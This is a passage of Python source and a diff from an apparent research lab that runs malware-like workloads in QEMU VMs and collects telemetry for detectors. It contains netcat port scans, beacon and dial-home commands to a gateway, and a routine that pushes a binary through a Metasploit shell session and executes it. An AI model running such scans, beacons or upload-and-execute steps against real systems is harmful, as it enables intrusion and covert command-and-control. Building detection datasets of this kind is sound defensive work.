    a usable state on completion (return code 0 on the prompt)."""
    profile: str
    start_cmd: str
    stop_cmd: str
    description: str

    @property
    def pid_path(self) -> str:
        return f"/tmp/.cis490-workload-{self.profile}.pid"


def _wrap_loop(name: str, body: str) -> Workload:
    """Common pattern: write a small wrapper script that loops ``body``,
    background it, and stash the wrapper's PID. Stop kills that PID +
    its child group."""
    pid_path = f"/tmp/.cis490-workload-{name}.pid"
    script_path = f"/tmp/.cis490-workload-{name}.sh"
    # Write the body through a quoted heredoc ('CIS490_EOF') so the
    # session shell performs no expansion on it and single quotes
    # inside the body need no escaping.
    start = (
        f"cat > {script_path} <<'CIS490_EOF'\n"
        f"#!/bin/sh\n"
        f"trap 'exit 0' TERM INT\n"
        f"while :; do\n"
        f"{body}\n"
        f"done\n"
        f"CIS490_EOF\n"
        f"chmod +x {script_path}; "
        f"nohup sh {script_path} </dev/null >/dev/null 2>&1 &\n"
        f"echo $! > {pid_path}\n"
        # disown is a bash builtin; dash and busybox sh lack it, so
        # tolerate its absence to keep the exit status at 0.
        f"disown 2>/dev/null || true\n"
    )
    stop = (
        f"if [ -f {pid_path} ]; then "
        f" kill -- -$(cat {pid_path}) 2>/dev/null; "
        f" kill $(cat {pid_path}) 2>/dev/null; "
        f" rm -f {pid_path} {script_path}; "
        f"fi; true\n"
    )
    return Workload(profile=name, start_cmd=start, stop_cmd=stop,
                    description="(generated)")


# ---------------------------------------------------------------------------
# Profile factories — each returns a Workload tuned to that family
# ---------------------------------------------------------------------------


def _cpu_saturate() -> Workload:
    """XMRig-class — sustained single-vCPU saturation, no IO, no net."""
    body = " yes > /dev/null 2>&1 &\n wait $!\n"
    w = _wrap_loop("cpu-saturate", body)
    return Workload(
        profile="cpu-saturate",
        start_cmd=w.start_cmd,
        stop_cmd=w.stop_cmd,
        description="100% CPU on 1 vCPU; no IO, no net",
    )


def _scan_and_dial() -> Workload:
    """Mirai-class — TCP SYN-style probe of bridge subnet + occasional
    "dial home" to the gateway. Heavy net, moderate CPU.

    Uses ``nc`` (netcat) instead of bash's /dev/tcp redirects — the
    latter is bash-only and silently no-ops on busybox / dash, which
    is what Metasploitable2 and Alpine guest sessions actually run.
    There is no fallback: if ``nc`` is missing in the guest, the
    probes fail silently and the loop keeps running."""
    body = (
        " for i in 1 2 3 4 5 6 7 8 9 10; do\n"
        " nc -z -w 1 10.200.0.$((i+1)) 23 >/dev/null 2>&1 &\n"
        " nc -z -w 1 10.200.0.$((i+1)) 2323 >/dev/null 2>&1 &\n"
        " done\n"
        " wait\n"
        " echo dial-home | nc -w 1 10.200.0.1 4444 >/dev/null 2>&1\n"
        " sleep 2\n"
    )
    w = _wrap_loop("scan-and-dial", body)
    return Workload(
        profile="scan-and-dial",
        start_cmd=w.start_cmd,
        stop_cmd=w.stop_cmd,
        description="Periodic SYN-style scan across bridge IPs + dial-home",
    )


def _io_walk() -> Workload:
    """Cryptolocker-class — fs traversal + write spikes. Heavy disk."""
    body = (
        " mkdir -p /tmp/.cis490-victim\n"
        " for n in 1 2 3 4 5 6 7 8; do\n"
        " dd if=/dev/urandom of=/tmp/.cis490-victim/f$n bs=4k count=64 2>/dev/null\n"
        " done\n"
        " for f in /tmp/.cis490-victim/*; do cat $f > /dev/null; done\n"
        " sleep 1\n"
    )
    w = _wrap_loop("io-walk", body)
    return Workload(
        profile="io-walk",
        start_cmd=w.start_cmd,
        stop_cmd=w.stop_cmd,
        description="FS traversal + random-data writes, periodic re-read",
    )


def _bursty_c2() -> Workload:
    """Dridex-class — long idle, periodic small TCP burst to a fixed
    peer (the bridge gateway). nc-based for busybox compatibility."""
    body = (
        " sleep 25\n"
        " for i in 1 2 3; do\n"
        " echo c2-beacon-$$-$i | nc -w 1 10.200.0.1 4445 >/dev/null 2>&1\n"
        " sleep 1\n"
        " done\n"
    )
    w = _wrap_loop("bursty-c2", body)
    return Workload(
        profile="bursty-c2",
        start_cmd=w.start_cmd,
        stop_cmd=w.stop_cmd,
        description="Long idle + periodic 3-packet egress burst to gateway",
    )


def _low_and_slow() -> Workload:
    """Kovter-class — low CPU, periodic memory churn, no on-disk
    artifact. The hardest envelope to label from /proc alone."""
    body = (
        " sleep 8\n"
        " awk 'BEGIN { for(i=0;i<200000;i++) a[i]=i*i; }' >/dev/null 2>&1\n"
        " sleep 4\n"
    )
    w = _wrap_loop("low-and-slow", body)
    return Workload(
        profile="low-and-slow",
        start_cmd=w.start_cmd,
        stop_cmd=w.stop_cmd,
        description="Periodic memory churn (~200k array allocs) on a slow cycle",
    )


def _shell_resident() -> Workload:
    """RAT-style — keep a single TCP connection open to the gateway
    with occasional command bursts. Long-lived flow, small bytes.

    Uses ``nc -w`` on the busybox-compatible path. We pipe a slow
    feed into nc so the connection stays open for ~30 s before the
    -w idle timeout closes it, matching the long-lived-flow shape.
    Then we sleep + reconnect, producing the periodic-tick pattern."""
    body = (
        " ( for i in 1 2 3 4 5 6; do\n"
        " echo cmd-tick-$i\n"
        " sleep 5\n"
        " done ) | nc -w 30 10.200.0.1 4446 >/dev/null 2>&1\n"
        " sleep 5\n"
    )
    w = _wrap_loop("shell-resident", body)
    return Workload(
        profile="shell-resident",
        start_cmd=w.start_cmd,
        stop_cmd=w.stop_cmd,
        description="Resident TCP connection to gateway with periodic ticks",
    )


_FACTORIES = {
    "cpu-saturate": _cpu_saturate,
    "scan-and-dial": _scan_and_dial,
    "io-walk": _io_walk,
    "bursty-c2": _bursty_c2,
    "low-and-slow": _low_and_slow,
    "shell-resident": _shell_resident,
}


def workload_for(sample: Sample | None) -> Workload | None:
    """Return the Workload matching ``sample.profile``, or None when
    no sample is supplied (driver v1 fallback path)."""
    if sample is None:
        return None
    factory = _FACTORIES.get(sample.profile)
    if factory is None:
        log.warning("no workload profile for %r; falling back to cpu-saturate", sample.profile)
        return _cpu_saturate()
    return factory()


def all_profiles() -> list[str]:
    return sorted(_FACTORIES.keys())
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
# Tier-4 path: real-binary upload + execute inside the shell session
# ---------------------------------------------------------------------------


@dataclass(frozen=True)
class ChunkedUpload:
    """Multi-step upload plan. Each chunk is one ``shell_write`` call;
    the driver issues them in order, then a final integrity check, then
    the exec command. The last command runs the binary and writes its
    PID to ``pid_path``."""
    profile: str
    chunks: tuple[str, ...]  # each is a complete shell command
    finalize_cmd: str  # decode + verify sha256 + chmod
    exec_cmd: str  # actually launch the binary
    stop_cmd: str
    bin_path: str
    pid_path: str
    expected_sha256: str
    n_chunks: int


# Conservative chunk size: msfrpc shell_write payloads are reliable
# under ~16 KiB (single TCP write inside the framework). Use 8 KiB of
# *base64* (which is 6 KiB of binary) per chunk so we leave room for
# the wrapper and stay well under the limit.
_CHUNK_B64_BYTES = 8 * 1024


def chunked_real_binary_upload(
    binary_bytes: bytes,
    sample: Sample | None = None,
) -> ChunkedUpload:
    """Plan a chunked upload of ``binary_bytes`` into a shell session.

    First chunk creates an empty file; subsequent chunks append a
    base64 segment. ``finalize_cmd`` decodes + sha256-verifies the
    result; ``exec_cmd`` launches the binary and stashes its PID.
    The driver issues these as separate shell_writes so we never
    push more than ~10 KiB through msfrpc in a single call."""
    import base64 as _b64
    import hashlib as _hashlib

    profile = (sample.profile if sample else "real-binary")
    pid_path = f"/tmp/.cis490-real-{profile}.pid"
    bin_path = f"/tmp/.cis490-real-{profile}.bin"
    b64_path = f"/tmp/.cis490-real-{profile}.b64"
    sha = _hashlib.sha256(binary_bytes).hexdigest()
    encoded = _b64.b64encode(binary_bytes).decode("ascii")

    chunks: list[str] = []
    chunks.append(f"mkdir -p /tmp; : > {b64_path}; echo upload-begin")
    for i in range(0, len(encoded), _CHUNK_B64_BYTES):
        seg = encoded[i:i + _CHUNK_B64_BYTES]
        # printf '%s' emits the segment verbatim (no format parsing, no trailing newline).
        chunks.append(f"printf '%s' '{seg}' >> {b64_path}")

    finalize = (
        f"base64 -d {b64_path} > {bin_path} && rm -f {b64_path} && "
        f"chmod +x {bin_path} && "
        f"GOT=$(sha256sum {bin_path} | awk '{{print $1}}') && "
        f"if [ \"$GOT\" = \"{sha}\" ]; then echo sha-ok; "
        f"else echo sha-mismatch:$GOT; rm -f {bin_path}; false; fi"
    )
    exec_cmd = (
        f"nohup {bin_path} </dev/null >/dev/null 2>&1 & "
        f"echo $! > {pid_path}; disown; echo exec-ok"
    )
    stop = (
        f"if [ -f {pid_path} ]; then "
        f" kill -- -$(cat {pid_path}) 2>/dev/null; "
        f" kill $(cat {pid_path}) 2>/dev/null; "
        f" rm -f {pid_path} {bin_path}; "
        f"fi; true"
    )
    return ChunkedUpload(
        profile=f"real:{profile}",
        chunks=tuple(chunks),
        finalize_cmd=finalize,
        exec_cmd=exec_cmd,
        stop_cmd=stop,
        bin_path=bin_path,
        pid_path=pid_path,
        expected_sha256=sha,
        n_chunks=len(chunks),
    )


def real_binary_workload(binary_bytes: bytes, sample: Sample | None = None) -> Workload:
    """Backwards-compat wrapper that produces a single-shot Workload
    by concatenating a chunked plan into one start_cmd. Kept for
    callers that drive the v1 single-shell-write flow (e.g. tests).

    Production path: the driver should call ``chunked_real_binary_upload``
    and walk the chunks itself so msfrpc never sees a buffer-busting
    payload."""
    plan = chunked_real_binary_upload(binary_bytes, sample=sample)
    start = "\n".join(list(plan.chunks) + [plan.finalize_cmd, plan.exec_cmd]) + "\n"
    return Workload(
        profile=plan.profile,
        start_cmd=start,
        stop_cmd=plan.stop_cmd,
        description=f"Real binary upload+execute ({len(binary_bytes)} bytes, {plan.n_chunks} chunks)",
    )
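The chunking step of the upload plan above can be checked off-target. The following is a minimal sketch, not the module's own code: `split_b64`, `reassemble`, and `CHUNK_B64_BYTES` are hypothetical names, and the 8 KiB segment size is assumed to mirror `_CHUNK_B64_BYTES`. It shows that cutting the base64 text into fixed-size segments and concatenating them again reproduces the original bytes and digest.

```python
import base64
import hashlib

CHUNK_B64_BYTES = 8 * 1024  # assumption: mirrors _CHUNK_B64_BYTES in the diff


def split_b64(payload: bytes, chunk_size: int = CHUNK_B64_BYTES) -> list[str]:
    """Base64-encode ``payload`` and cut the text into fixed-size segments."""
    encoded = base64.b64encode(payload).decode("ascii")
    return [encoded[i:i + chunk_size] for i in range(0, len(encoded), chunk_size)]


def reassemble(segments: list[str]) -> bytes:
    """Concatenate the segments and decode them in one pass."""
    return base64.b64decode("".join(segments))


payload = bytes(range(256)) * 100  # 25,600 bytes of sample data
segments = split_b64(payload)
restored = reassemble(segments)
sha_ok = hashlib.sha256(restored).hexdigest() == hashlib.sha256(payload).hexdigest()
```

Because every segment except possibly the last has the same length, the segment count is simply the encoded length divided by the chunk size, rounded up.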
@@ -36,7 +36,8 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Callable

-from collectors import proc_qemu
+from collectors import guest_agent, pcap, perf_qemu, proc_qemu, qmp
+from samples.manifest import Sample

 from .ulid import new_ulid

@@ -61,6 +62,38 @@ class EpisodeConfig:
     # When set, walk this schedule and ignore duration_s for sleep timing.
     # ``duration_s`` still goes in meta.schedule for record-keeping.
     phase_schedule: PhaseSchedule | None = None
+    # Optional: paths to QEMU sockets exposed by the launcher. When
+    # set, EpisodeRunner spins up additional collector threads.
+    qmp_socket: Path | None = None
+    qmp_interval_ms: int = 1000  # QMP queries are heavier than /proc reads
+    guest_agent_socket: Path | None = None
+    # Optional: bridge interface to capture per-episode pcap on. When
+    # set, EpisodeRunner spawns tcpdump for the duration of the
+    # schedule and bucketizes the result into netflow.jsonl on stop.
+    bridge_iface: str | None = None
+    bridge_ip: str = "10.200.0.1"
+    pcap_snaplen: int = 256
+    # Source 3: perf stat sampling. Disabled by default because perf
+    # needs CAP_SYS_ADMIN or perf_event_paranoid <= 1; enable
+    # explicitly per-episode when the host supports it.
+    enable_perf: bool = False
+    perf_interval_ms: int = 100
+    # The Sample that drove this episode's workload selection. Stamped
+    # into meta.json so trainers can join episodes by family / kind
+    # without re-deriving from events. None = v1 yes-loop fallback.
+    sample: Sample | None = None
+    # The exploit module that fired (Tier 3+). Plain dict so the runner
+    # doesn't need to import exploits.modules; populated by callers
+    # that have a ModuleConfig in hand.
+    exploit_meta: dict | None = None
+    # Snapshot/revert (Tier 0+):
+    # revert_at_start — before any phase walks, loadvm <snapshot_name>.
+    # Use this to drop the guest back to a known-good baseline at
+    # the start of every episode in a long-lived-VM fleet loop.
+    # revert_at_end — after the schedule walks, loadvm <snapshot_name>
+    # so the next consumer of this VM starts clean too.
+    revert_at_start: bool = False
+    revert_at_end: bool = False


 @dataclass
@@ -68,8 +101,13 @@ class EpisodeResult:
     episode_id: str
     episode_dir: Path
     rows_proc: int
-    pid_disappeared: bool
-    duration_observed_s: float
+    rows_qmp: int = 0
+    rows_guest: int = 0
+    rows_netflow: int = 0
+    rows_perf: int = 0
+    pcap_bytes: int = 0
+    pid_disappeared: bool = False
+    duration_observed_s: float = 0.0
     phases_observed: list[str] = field(default_factory=list)


@@ -83,25 +121,73 @@ class EpisodeRunner:
         self.on_phase = on_phase
         self.episode_id = cfg.episode_id or new_ulid()
         self.episode_dir: Path = cfg.data_root / "episodes" / self.episode_id
+        # Create the dir up front so external drivers can call
+        # emit_event() between construction and run() — e.g. an exploit
+        # driver that writes a driver_setup event before the schedule
+        # walks. The dir is otherwise empty until run() opens files.
+        self.episode_dir.mkdir(parents=True, exist_ok=True)
         self._t_mono_origin_ns: int = 0
         self._stop = threading.Event()

     # ---- public ---------------------------------------------------------

     def run(self) -> EpisodeResult:
-        self.episode_dir.mkdir(parents=True, exist_ok=True)
         self._t_mono_origin_ns = time.monotonic_ns()
-        started_at_wall = datetime.now(timezone.utc).isoformat()
+        # snapshot_load is the marker for "episode clock = 0". Emit
+        # BEFORE any file I/O — _write_meta() takes >1 ms on slow disks
+        # (Refs spectral/CIS490#7).
+        self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)

+        started_at_wall = datetime.now(timezone.utc).isoformat()
         meta = self._initial_meta(started_at_wall)
         self._write_meta(meta)

-        self._emit_event(0, "snapshot_load", snapshot=self.cfg.snapshot_name)
+        # Snapshot revert at start: pause+restore the guest to a known
+        # baseline before phase 0. Requires QMP and a savevm having
+        # already taken place (the launcher is responsible for that).
+        if self.cfg.revert_at_start and self.cfg.qmp_socket is not None:
+            try:
+                client = qmp.QMPClient(self.cfg.qmp_socket)
+                client.connect()
+                try:
+                    out = client.loadvm(self.cfg.snapshot_name)
+                    self.emit_event(
+                        "snapshot_revert",
+                        when="start",
+                        snapshot=self.cfg.snapshot_name,
+                        output=(out or "").strip()[:256],
+                    )
+                finally:
+                    client.close()
+            except Exception as e:
+                log.warning("loadvm at start failed: %s", e)
+                self.emit_event(
+                    "snapshot_revert_failed",
+                    when="start",
+                    snapshot=self.cfg.snapshot_name,
+                    error=str(e),
+                )

-        rows_holder: dict[str, int] = {"rows": 0}
+        rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0, "netflow": 0, "perf": 0}
+        pcap_handle: pcap.CaptureHandle | None = None
+        pcap_path = self.episode_dir / "network.pcap"
+        netflow_path = self.episode_dir / "netflow.jsonl"
+        if self.cfg.bridge_iface:
+            try:
+                pcap_handle = pcap.run_capture(
+                    bridge=self.cfg.bridge_iface,
+                    pcap_path=pcap_path,
+                    snaplen=self.cfg.pcap_snaplen,
+                )
+                self.emit_event("pcap_started", iface=self.cfg.bridge_iface)
+            except (OSError, FileNotFoundError) as e:
+                log.warning("pcap capture not available on %s: %s",
+                            self.cfg.bridge_iface, e)
+                self.emit_event("pcap_unavailable",
+                                iface=self.cfg.bridge_iface, error=str(e))

-        def _collector() -> None:
-            rows_holder["rows"] = proc_qemu.run_loop(
+        def _proc_collector() -> None:
+            rows_holder["proc"] = proc_qemu.run_loop(
                 pid=self.cfg.target_pid,
                 output_path=self.episode_dir / "telemetry-proc.jsonl",
                 t_mono_origin_ns=self._t_mono_origin_ns,
@@ -109,8 +195,44 @@ class EpisodeRunner:
                 stop_event=self._stop,
             )

-        t = threading.Thread(target=_collector, daemon=True, name="proc_qemu")
-        t.start()
+        def _qmp_collector() -> None:
+            assert self.cfg.qmp_socket is not None
+            rows_holder["qmp"] = qmp.run_loop(
+                socket_path=self.cfg.qmp_socket,
+                output_path=self.episode_dir / "telemetry-qmp.jsonl",
+                t_mono_origin_ns=self._t_mono_origin_ns,
+                interval_ms=self.cfg.qmp_interval_ms,
+                stop_event=self._stop,
+            )
+
+        def _guest_collector() -> None:
+            assert self.cfg.guest_agent_socket is not None
+            rows_holder["guest"] = guest_agent.run_loop(
+                socket_path=self.cfg.guest_agent_socket,
+                output_path=self.episode_dir / "telemetry-guest.jsonl",
+                t_mono_origin_ns=self._t_mono_origin_ns,
+                stop_event=self._stop,
+            )
+
+        def _perf_collector() -> None:
+            rows_holder["perf"] = perf_qemu.run_loop(
+                pid=self.cfg.target_pid,
+                output_path=self.episode_dir / "telemetry-perf.jsonl",
+                t_mono_origin_ns=self._t_mono_origin_ns,
+                interval_ms=self.cfg.perf_interval_ms,
+                stop_event=self._stop,
+            )
+
+        threads: list[threading.Thread] = []
+        threads.append(threading.Thread(target=_proc_collector, daemon=True, name="proc_qemu"))
+        if self.cfg.qmp_socket is not None:
+            threads.append(threading.Thread(target=_qmp_collector, daemon=True, name="qmp"))
+        if self.cfg.guest_agent_socket is not None:
+            threads.append(threading.Thread(target=_guest_collector, daemon=True, name="guest_agent"))
+        if self.cfg.enable_perf:
+            threads.append(threading.Thread(target=_perf_collector, daemon=True, name="perf"))
+        for t in threads:
+            t.start()

         phases_observed: list[str] = []
         try:
@@ -121,21 +243,60 @@ class EpisodeRunner:
                 phases_observed = ["clean"]
                 self._stop.wait(timeout=self.cfg.duration_s)
         finally:
-            self._stop.set()
-            t.join(timeout=2.0)
+            # Optional revert before stopping collectors so the
+            # transition shows up in their telemetry too — useful for
+            # building "snapshot revert" as a labeled phase later.
+            if self.cfg.revert_at_end and self.cfg.qmp_socket is not None:
+                try:
+                    client = qmp.QMPClient(self.cfg.qmp_socket)
+                    client.connect()
+                    try:
+                        out = client.loadvm(self.cfg.snapshot_name)
+                        self.emit_event(
+                            "snapshot_revert",
+                            when="end",
+                            snapshot=self.cfg.snapshot_name,
+                            output=(out or "").strip()[:256],
+                        )
+                    finally:
+                        client.close()
+                except Exception as e:
+                    log.warning("loadvm at end failed: %s", e)
+                    self.emit_event(
+                        "snapshot_revert_failed",
+                        when="end",
+                        snapshot=self.cfg.snapshot_name,
+                        error=str(e),
+                    )
+
+            self._stop.set()
+            for t in threads:
+                t.join(timeout=3.0)
+            if pcap_handle is not None:
+                rc = pcap.stop_capture(pcap_handle)
+                self.emit_event("pcap_stopped", rc=rc,
+                                pcap_bytes=pcap_path.stat().st_size if pcap_path.exists() else 0)
+                rows_holder["netflow"] = pcap.bucketize(
+                    pcap_path, netflow_path,
+                    bucket_ms=100,
+                    t_mono_origin_ns=self._t_mono_origin_ns,
+                    bridge_ip=self.cfg.bridge_ip,
+                )

-        end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
         pid_alive = _pid_alive(self.cfg.target_pid)
-        self._emit_event(
-            end_mono_ns,
-            "episode_end",
-            target_pid_alive=pid_alive,
-        )
+        self.emit_event("episode_end", target_pid_alive=pid_alive)
+        end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns

         meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
+        pcap_size = pcap_path.stat().st_size if pcap_path.exists() else 0
         meta["result"] = {
             "phases_observed": phases_observed,
-            "rows_proc": rows_holder["rows"],
+            "rows_proc": rows_holder["proc"],
+            "rows_qmp": rows_holder["qmp"],
+            "rows_guest": rows_holder["guest"],
+            "rows_perf": rows_holder["perf"],
+            "rows_netflow": rows_holder["netflow"],
+            "pcap_bytes": pcap_size,
             "pid_alive_at_end": pid_alive,
             "duration_observed_s": end_mono_ns / 1_000_000_000,
         }
@@ -143,16 +304,22 @@ class EpisodeRunner:
         (self.episode_dir / "done.marker").touch()

         log.info(
-            "episode %s complete: rows=%d duration=%.2fs phases=%s",
+            "episode %s complete: proc=%d qmp=%d guest=%d perf=%d netflow=%d pcap=%dB duration=%.2fs phases=%s",
             self.episode_id,
-            rows_holder["rows"],
+            rows_holder["proc"], rows_holder["qmp"], rows_holder["guest"],
+            rows_holder["perf"], rows_holder["netflow"], pcap_size,
             end_mono_ns / 1e9,
             phases_observed,
         )
         return EpisodeResult(
             episode_id=self.episode_id,
             episode_dir=self.episode_dir,
-            rows_proc=rows_holder["rows"],
+            rows_proc=rows_holder["proc"],
+            rows_qmp=rows_holder["qmp"],
+            rows_guest=rows_holder["guest"],
+            rows_netflow=rows_holder["netflow"],
+            rows_perf=rows_holder["perf"],
+            pcap_bytes=pcap_size,
             pid_disappeared=not pid_alive,
             duration_observed_s=end_mono_ns / 1_000_000_000,
             phases_observed=phases_observed,
@@ -171,9 +338,7 @@ class EpisodeRunner:
                 break
             t_mono = time.monotonic_ns() - self._t_mono_origin_ns
             self._emit_label(t_mono, phase, prev=prev, reason="scheduled")
-            self._emit_event(
-                t_mono, "phase_transition", to=phase, prev=prev
-            )
+            self.emit_event("phase_transition", to=phase, prev=prev)
             if self.on_phase is not None:
                 try:
                     self.on_phase(phase)
@@ -185,6 +350,17 @@ class EpisodeRunner:
         return observed

     def _initial_meta(self, started_at_wall: str) -> dict:
+        sample_meta: dict | None = None
+        if self.cfg.sample is not None:
+            s = self.cfg.sample
+            sample_meta = {
+                "name": s.name,
+                "family": s.family,
+                "category": s.category,
+                "profile": s.profile,
+                "kind": s.kind,
+                "sha256": s.sha256,
+            }
         return {
             "episode_id": self.episode_id,
             "schema_version": SCHEMA_VERSION,
@@ -202,8 +378,8 @@ class EpisodeRunner:
                 "ram_mib": None,
                 "target_pid": self.cfg.target_pid,
             },
-            "exploit": None,
-            "sample": None,
+            "exploit": self.cfg.exploit_meta,
+            "sample": sample_meta,
             "schedule": {
                 "baseline_seconds": self.cfg.duration_s,
                 "interval_ms": self.cfg.interval_ms,
@@ -220,7 +396,15 @@ class EpisodeRunner:
             f.write("\n")
         os.replace(tmp, path)

-    def _emit_event(self, t_mono_ns: int, event: str, **extra) -> None:
+    def emit_event(self, event: str, **extra) -> None:
+        """Append a row to events.jsonl. Public so external drivers
+        (e.g. the MSF exploit driver) can stamp their own events with
+        the same monotonic clock the orchestrator is using."""
+        t_mono_ns = (
+            time.monotonic_ns() - self._t_mono_origin_ns
+            if self._t_mono_origin_ns
+            else 0
+        )
         row = {
             "t_mono_ns": t_mono_ns,
             "t_wall_ns": time.time_ns(),
467
orchestrator/fleet.py
Normal file
@@ -0,0 +1,467 @@
"""Fleet runner — concurrent VM episodes with resource awareness.

The lab host detects its own capacity, picks how many VMs to run in
parallel without driving the box into swap or starving the host
itself, and runs that many episodes simultaneously. Each slot gets a
distinct ``Sample`` from the manifest (deterministically chosen by
host_id + slot index), so every concurrent VM produces novel,
labelable data.

Capacity heuristic — defaults documented inline so they're auditable:

    cores_total      = os.cpu_count()
    cores_reserved   = max(1, cores_total // 8)    # host + collectors
    ram_per_vm_mib   = 320                         # Alpine fits in 256
                                                   # but leave 64 for
                                                   # overhead (qemu+ovmf)
    ram_headroom_mib = max(1024, ram_total // 8)   # never starve host
    max_by_cores     = cores_total - cores_reserved
    max_by_ram       = (ram_available - ram_headroom) // ram_per_vm
    max_by_load      = max(1, max_by_cores // 2) if (load_1m / cores) > 0.75 else max_by_cores

The smallest of these wins. The reasoning string is logged + saved
into each episode's meta.json under ``fleet`` so post-hoc analysis
can correlate "this episode was run when 6 VMs were concurrent" with
its observed envelope.
"""

from __future__ import annotations

import logging
import os
import shutil
import signal
import subprocess
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass, field
from pathlib import Path

from exploits.modules import (
    ModuleConfig, load_module_configs, module_target_port, select_module,
)
from samples.manifest import Sample, SampleManifest


log = logging.getLogger("cis490.fleet")


def _msfrpcd_available(host: str = "127.0.0.1", port: int = 55553) -> bool:
    """True when msfrpcd is listening — gate for the Tier-3 default.
    A Tier-2 fallback runs when msfrpcd isn't there (still useful
    data, just labeled with no-exploit so the trainer can filter)."""
    import socket as _sk
    try:
        with _sk.create_connection((host, port), timeout=0.3):
            return True
    except OSError:
        return False


@dataclass(frozen=True)
class FleetCapacity:
    cores_total: int
    cores_reserved: int
    ram_total_mib: int
    ram_available_mib: int
    ram_per_vm_mib: int
    ram_headroom_mib: int
    load_1m: float
    max_by_cores: int
    max_by_ram: int
    max_by_load: int
    max_concurrent: int
    rationale: str

    def to_dict(self) -> dict:
        return {
            "cores_total": self.cores_total,
            "cores_reserved": self.cores_reserved,
            "ram_total_mib": self.ram_total_mib,
            "ram_available_mib": self.ram_available_mib,
            "ram_per_vm_mib": self.ram_per_vm_mib,
            "ram_headroom_mib": self.ram_headroom_mib,
            "load_1m": self.load_1m,
            "max_by_cores": self.max_by_cores,
            "max_by_ram": self.max_by_ram,
            "max_by_load": self.max_by_load,
            "max_concurrent": self.max_concurrent,
            "rationale": self.rationale,
        }


@dataclass
class FleetConfig:
    host_id: str
    repo_root: Path
    data_root: Path
    manifest: SampleManifest
    # Module catalog for Tier-3 dispatch. Required for fleet-driven
    # exploit-fire variety; empty catalog forces Tier-2 fallback.
    modules: dict[str, ModuleConfig] = field(default_factory=dict)
    # VM resource shape — must match what the launcher requests.
    ram_per_vm_mib: int = 320
    # Cap concurrency below the calculated max (e.g. for a smoke test).
    max_concurrent_override: int | None = None
    # Skip episodes whose sample requires a real binary that's not present.
    require_real_samples: bool = False
    # Force Tier-2 even when msfrpcd is up; used by tests + dev runs
    # that want a no-exploit baseline.
    force_tier2: bool = False
    # msfrpcd connectivity (read by tier-3 driver via env).
    msfrpcd_host: str = "127.0.0.1"
    msfrpcd_port: int = 55553


def _read_meminfo() -> dict[str, int]:
    out: dict[str, int] = {}
    try:
        with open("/proc/meminfo") as f:
            for line in f:
                k, _, rest = line.partition(":")
                v = rest.strip()
                if v.endswith(" kB"):
                    try:
                        out[k] = int(v[:-3]) * 1024
                    except ValueError:
                        pass
    except OSError:
        pass
    return out


def _read_loadavg() -> float:
    try:
        with open("/proc/loadavg") as f:
            return float(f.read().split()[0])
    except (OSError, ValueError, IndexError):
        return 0.0
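The `/proc/meminfo` parsing above can be exercised without a Linux host by feeding it text directly. This is a sketch under that assumption: `parse_meminfo` and the `SAMPLE` text are hypothetical stand-ins, not part of the module. It shows that only lines carrying a ` kB` unit are kept, and that values come back in bytes.

```python
def parse_meminfo(text: str) -> dict[str, int]:
    """Parse /proc/meminfo-style text into {key: bytes}, skipping unitless rows."""
    out: dict[str, int] = {}
    for line in text.splitlines():
        key, _, rest = line.partition(":")
        value = rest.strip()
        if value.endswith(" kB"):
            try:
                out[key] = int(value[:-3]) * 1024  # kB -> bytes
            except ValueError:
                pass  # ignore rows whose number does not parse
    return out


# Illustrative input only; real files carry many more rows.
SAMPLE = (
    "MemTotal:       16384000 kB\n"
    "MemAvailable:    8192000 kB\n"
    "HugePages_Total:       0\n"
)
parsed = parse_meminfo(SAMPLE)
```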
def detect_capacity(*, ram_per_vm_mib: int = 320) -> FleetCapacity:
    cores_total = os.cpu_count() or 1
    # Reserve at least 1 core, more if the host has many.
    cores_reserved = max(1, cores_total // 8)

    mem = _read_meminfo()
    ram_total_b = mem.get("MemTotal", 0)
    ram_avail_b = mem.get("MemAvailable", ram_total_b)
    ram_total_mib = ram_total_b // (1024 * 1024)
    ram_available_mib = ram_avail_b // (1024 * 1024)
    # Headroom: leave the host at least 1 GiB, or 1/8 of total RAM if larger.
    ram_headroom_mib = max(1024, ram_total_mib // 8)

    load_1m = _read_loadavg()

    max_by_cores = max(0, cores_total - cores_reserved)
    if ram_per_vm_mib <= 0:
        max_by_ram = max_by_cores
    else:
        max_by_ram = max(0, (ram_available_mib - ram_headroom_mib) // ram_per_vm_mib)

    # Load-based cap: if the host is already busy, run fewer VMs.
    if cores_total and load_1m / cores_total > 0.75:
        # Halve, floor 1.
        max_by_load = max(1, max_by_cores // 2)
    else:
        max_by_load = max_by_cores

    candidates = [max_by_cores, max_by_ram, max_by_load]
    max_concurrent = max(0, min(candidates))

    binding = ["cores", "ram", "load"][candidates.index(max_concurrent)] \
        if max_concurrent < max_by_cores else "cores"
    rationale = (
        f"cores_total={cores_total} reserved={cores_reserved} "
        f"ram_avail_mib={ram_available_mib} headroom={ram_headroom_mib} "
        f"per_vm={ram_per_vm_mib} load_1m={load_1m:.2f} "
        f"-> max_concurrent={max_concurrent} (binding={binding})"
    )
    log.info("capacity: %s", rationale)

    return FleetCapacity(
        cores_total=cores_total,
        cores_reserved=cores_reserved,
        ram_total_mib=ram_total_mib,
        ram_available_mib=ram_available_mib,
        ram_per_vm_mib=ram_per_vm_mib,
        ram_headroom_mib=ram_headroom_mib,
        load_1m=load_1m,
        max_by_cores=max_by_cores,
        max_by_ram=max_by_ram,
        max_by_load=max_by_load,
        max_concurrent=max_concurrent,
        rationale=rationale,
    )
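To see which limit binds on a given host, the heuristic can be restated as a pure function over explicit inputs. The sketch below is an illustration, not the module's API: `plan_capacity` is a hypothetical name and the host figures are made up. It applies the same arithmetic as `detect_capacity` without reading `/proc`.

```python
def plan_capacity(
    cores_total: int,
    ram_total_mib: int,
    ram_available_mib: int,
    load_1m: float,
    ram_per_vm_mib: int = 320,
) -> dict[str, int]:
    """Recompute the three caps and their minimum from explicit inputs."""
    cores_reserved = max(1, cores_total // 8)
    ram_headroom_mib = max(1024, ram_total_mib // 8)
    max_by_cores = max(0, cores_total - cores_reserved)
    max_by_ram = max(0, (ram_available_mib - ram_headroom_mib) // ram_per_vm_mib)
    # A busy host (load per core above 0.75) halves the core cap, floor 1.
    busy = load_1m / cores_total > 0.75
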